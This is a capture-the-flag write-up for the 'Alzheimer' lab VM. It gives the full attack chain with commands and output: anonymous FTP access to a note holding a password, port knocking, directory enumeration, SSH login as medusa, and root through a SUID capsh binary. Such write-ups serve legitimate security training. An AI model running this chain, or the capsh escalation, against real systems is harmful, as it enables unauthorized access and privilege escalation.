---------- Alzheimer Writeup ----------


--> arp-scan
      - We located target machine with arp-scan -l | grep "PCS"
      - Ip adress of the target machine is (10.0.2.49).


--> nmap 
    ─(root㉿kali)-[*]
    └─# nmap -sV -sC -p- -A -T4 10.0.2.49 
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 09:30 EDT
    Nmap scan report for 10.0.2.49
    Host is up (0.00064s latency).
     Not shown: 65532 closed tcp ports (reset)
    PORT   STATE    SERVICE VERSION
    21/tcp open     ftp     vsftpd 3.0.3
    | ftp-syst: 
    |   STAT: 
    | FTP server status:
    |      Connected to ::ffff:10.0.2.24
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 4
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    22/tcp filtered ssh
    80/tcp filtered http
    MAC Address: 08:00:27:55:02:43 (Oracle VirtualBox virtual NIC)
    Device type: general purpose
    Running: Linux 4.X|5.X
    OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
    OS details: Linux 4.15 - 5.8
    Network Distance: 1 hop
    Service Info: OS: Unix

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.63 ms 10.0.2.49

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 15.05 seconds

      - As you can see,  
        - 21/tcp ftp port is open.
        - 22/tcp ssh port is filtered. 
        - 80/tcp http port is filtered too.


--> ftp 
      - We can login ftp as an Anonymous user.
   
    ─(root㉿kali)-[*]
    └─# ftp Anonymous@10.0.2.49                                                                                          
    Connected to 10.0.2.49.
    220 (vsFTPd 3.0.3)
    331 Please specify the password.
Password: 
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
ftp> ls -la 
    229 Entering Extended Passive Mode (|||56672|)
    150 Here comes the directory listing.
    drwxr-xr-x    2 0        113          4096 Oct 03  2020 .
    drwxr-xr-x    2 0        113          4096 Oct 03  2020 ..
    -rw-r--r--    1 0        0              70 Oct 03  2020 .secretnote.txt
    226 Directory send OK.
ftp> get .secretnote.txt
    local: .secretnote.txt remote: .secretnote.txt
    229 Entering Extended Passive Mode (|||42932|)
    150 Opening BINARY mode data connection for .secretnote.txt (70 bytes).
    100% |**********************************************************************************|    70      108.50 KiB/s    00:00 ETA
    226 Transfer complete.
    70 bytes received in 00:00 (28.42 KiB/s)
ftp> exit
    221 Goodbye.

      - We found a .secretnote.txt file we can download it into our local machine and inspect further.

    ─(root㉿kali)-[*]
    └─# cat .secretnote.txt 
    I need to knock this ports and 
    one door will be open!
    1000
    2000
    3000
    Ihavebeenalwayshere!!!
    Ihavebeenalwayshere!!! --> lets save this and move on. 


--> konck 
      - Let's knock the ports as sugested in the text file we found.
    
    ─(root㉿kali)-[*]
    └─# knock -v 10.0.2.49 1000 2000 3000 -d 1000
    hitting tcp 10.0.2.49:1000
    hitting tcp 10.0.2.49:2000
    hitting tcp 10.0.2.49:3000

      - Knocked 1000, 2000, 3000 ports and later that lets check the ports with nmap again.

    ─(root㉿kali)-[*]
    └─# nmap -sVC -p- -A 10.0.2.49       
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 09:36 EDT
    Nmap scan report for 10.0.2.49
    Host is up (0.00050s latency).
    Not shown: 65532 closed tcp ports (reset)
    PORT   STATE    SERVICE VERSION
    21/tcp open     ftp     vsftpd 3.0.3
    | ftp-syst: 
    |   STAT: 
    | FTP server status:
    |      Connected to ::ffff:10.0.2.24
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 2
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    22/tcp filtered ssh
    80/tcp open     http    nginx 1.14.2
    |_http-server-header: nginx/1.14.2
    |_http-title: Site doesn't have a title (text/html).
    MAC Address: 08:00:27:55:02:43 (Oracle VirtualBox virtual NIC)
    Device type: general purpose
    Running: Linux 4.X|5.X
    OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
    OS details: Linux 4.15 - 5.8
    Network Distance: 1 hop
    Service Info: OS: Unix

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.50 ms 10.0.2.49

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 32.09 seconds

      - As you can see the 80/tcp http is open now lets investigate further.


--> gobuster 
    ─(root㉿kali)-[*]
    └─# gobuster dir -u http://10.0.2.49 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,php,txt
    ===============================================================
    Gobuster v3.6
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://10.0.2.49
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.6
    [+] Extensions:              txt,html,php
    [+] Timeout:                 10s
    ===============================================================
    Starting gobuster in directory enumeration mode
    ===============================================================
    /home                 (Status: 301) [Size: 185] [--> http://10.0.2.49/home/]
    /admin                (Status: 301) [Size: 185] [--> http://10.0.2.49/admin/]
    /secret               (Status: 301) [Size: 185] [--> http://10.0.2.49/secret/]
    Progress: 609679 / 882244 (69.11%)^C
    [!] Keyboard interrupt detected, terminating.
    Progress: 610545 / 882244 (69.20%)
    ===============================================================
    Finished
    ===============================================================

      - let's check the scan results in the webpage.
    
    ─(root㉿kali)-[*]
    └─# curl http://10.0.2.49
    I dont remember where I stored my password :(
    I only remember that was into a .txt file...
    -medusa

    <!---. --- - .... .. -. --. -->

      - Username is medusa note it down.

    ─(root㉿kali)-[*]
    └─# curl http://10.0.2.49/home/
    Maybe my pass is at home!
    -medusa

    ─(root㉿kali)-[*]
    └─# curl http://10.0.2.49/secret/
    Maybe my password is in this secret folder?

    ─(root㉿kali)-[*]
    └─# curl http://10.0.2.49/secret/home/
    Im trying a lot. Im sure that i will recover my pass!
    -medusa

      - This is a rabbit hole. But (I only remember that was into a .txt file...) this is writing in the main page.
      - We downloaded a txt file from ftp before.
      - I decided to use medusa as a username and Ihavebeenalwayshere!!! as a password. 


--> ssh login and Privilege Escalation
    ─(root㉿kali)-[*]
    └─# ssh medusa@10.0.2.49                       
    The authenticity of host '10.0.2.49 (10.0.2.49)' can't be established.
    ED25519 key fingerprint is SHA256:O2S8HAtlJxSTJJgIQUiIzsbSKX/qj9Thyn38JM6wsBY.
    This key is not known by any other names.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.0.2.49' (ED25519) to the list of known hosts.
medusa@10.0.2.49's password: 
    Linux alzheimer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Sat Oct  3 06:00:36 2020 from 192.168.1.58
medusa@alzheimer:~$ whoami;id;hostname
    medusa
    uid=1000(medusa) gid=1000(medusa) groups=1000(medusa),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
    alzheimer
medusa@alzheimer:~$ ls -la 
    total 32
    drwxr-xr-x 3 medusa medusa 4096 Oct  3  2020 .
    drwxr-xr-x 3 root   root   4096 Oct  2  2020 ..
    -rw-r--r-- 1 medusa medusa  220 Oct  2  2020 .bash_logout
    -rw-r--r-- 1 medusa medusa 3526 Oct  2  2020 .bashrc
    drwxr-xr-x 3 medusa medusa 4096 Oct  3  2020 .local
    -rw-r--r-- 1 medusa medusa  807 Oct  2  2020 .profile
    -rw-r--r-- 1 medusa medusa   19 Oct  3  2020 user.txt
    -rw------- 1 medusa medusa  107 Oct  3  2020 .Xauthority
medusa@alzheimer:~$ cat user.txt
    *****************  --> Here is your user flag congrats!!
medusa@alzheimer:~$ sudo -l 
    Matching Defaults entries for medusa on alzheimer:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User medusa may run the following commands on alzheimer:
        (ALL) NOPASSWD: /bin/id
medusa@alzheimer:~$ find / -perm -u=s -type f 2>/dev/null
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    /usr/bin/chsh
    /usr/bin/sudo
    /usr/bin/mount
    /usr/bin/newgrp
    /usr/bin/su
    /usr/bin/passwd
    /usr/bin/chfn
    /usr/bin/umount
    /usr/bin/gpasswd
    /usr/sbin/capsh  --> A quick search on internet: This tool provides a handy wrapper for certain types of capability testing and environment creation.
                         - In the GTFOBIN's: https://gtfobins.github.io/gtfobins/capsh/ we can enumarate it. 
medusa@alzheimer:~$ /usr/sbin/capsh --gid=0 --uid=0 --
root@alzheimer:~# whoami;id;hostname
    root
    uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(medusa)
    alzheimer
root@alzheimer:~# cd /root
root@alzheimer:/root# ls 
    root.txt
root@alzheimer:/root# cat root.txt
    *************** --> Here is your root flag congrats!!

    
    



    

    
